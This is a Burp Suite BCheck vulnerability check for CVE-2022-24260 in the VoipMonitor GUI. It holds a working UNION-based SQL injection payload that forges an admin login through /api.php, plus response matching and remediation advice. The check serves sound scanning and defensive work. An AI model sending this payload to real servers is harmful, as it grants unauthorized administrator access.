vulnerabilities-CVEd/CVE-2022-2460 VoipMonitor - Pre-Auth SQL Injection.bcheck

metadata:
	language: v1-beta
	name: "CVE-2022-24260 VoipMonitor - Pre-Auth SQL Injection"
	author: "Parimal Shaw"
	description: "Check for CVE-2022-24260."
	tags: "CVE-2022-24260"

define:
    potential_path = "/api.php"

given host then
    send request called check:
		method: "POST"
		replacing headers:
			"Content-Type": "application/x-www-form-urlencoded",
			"Accept": "*/*"
		path: {potential_path}
		body: "module=relogin&action=login&pass=nope&user=a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null; #"

			if {check.response.status_code} is "200" and "\"success\":true" in {check.response.body} and "_vm_version" in {check.response.body} and "_debug" in {check.response.body} then
					report issue:
						severity: high
						confidence: certain
						detail: "A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level."
						remediation: "Upgrade VoipMonitor to the latest version or input validation and parametrized queries including prepared statements."
			end if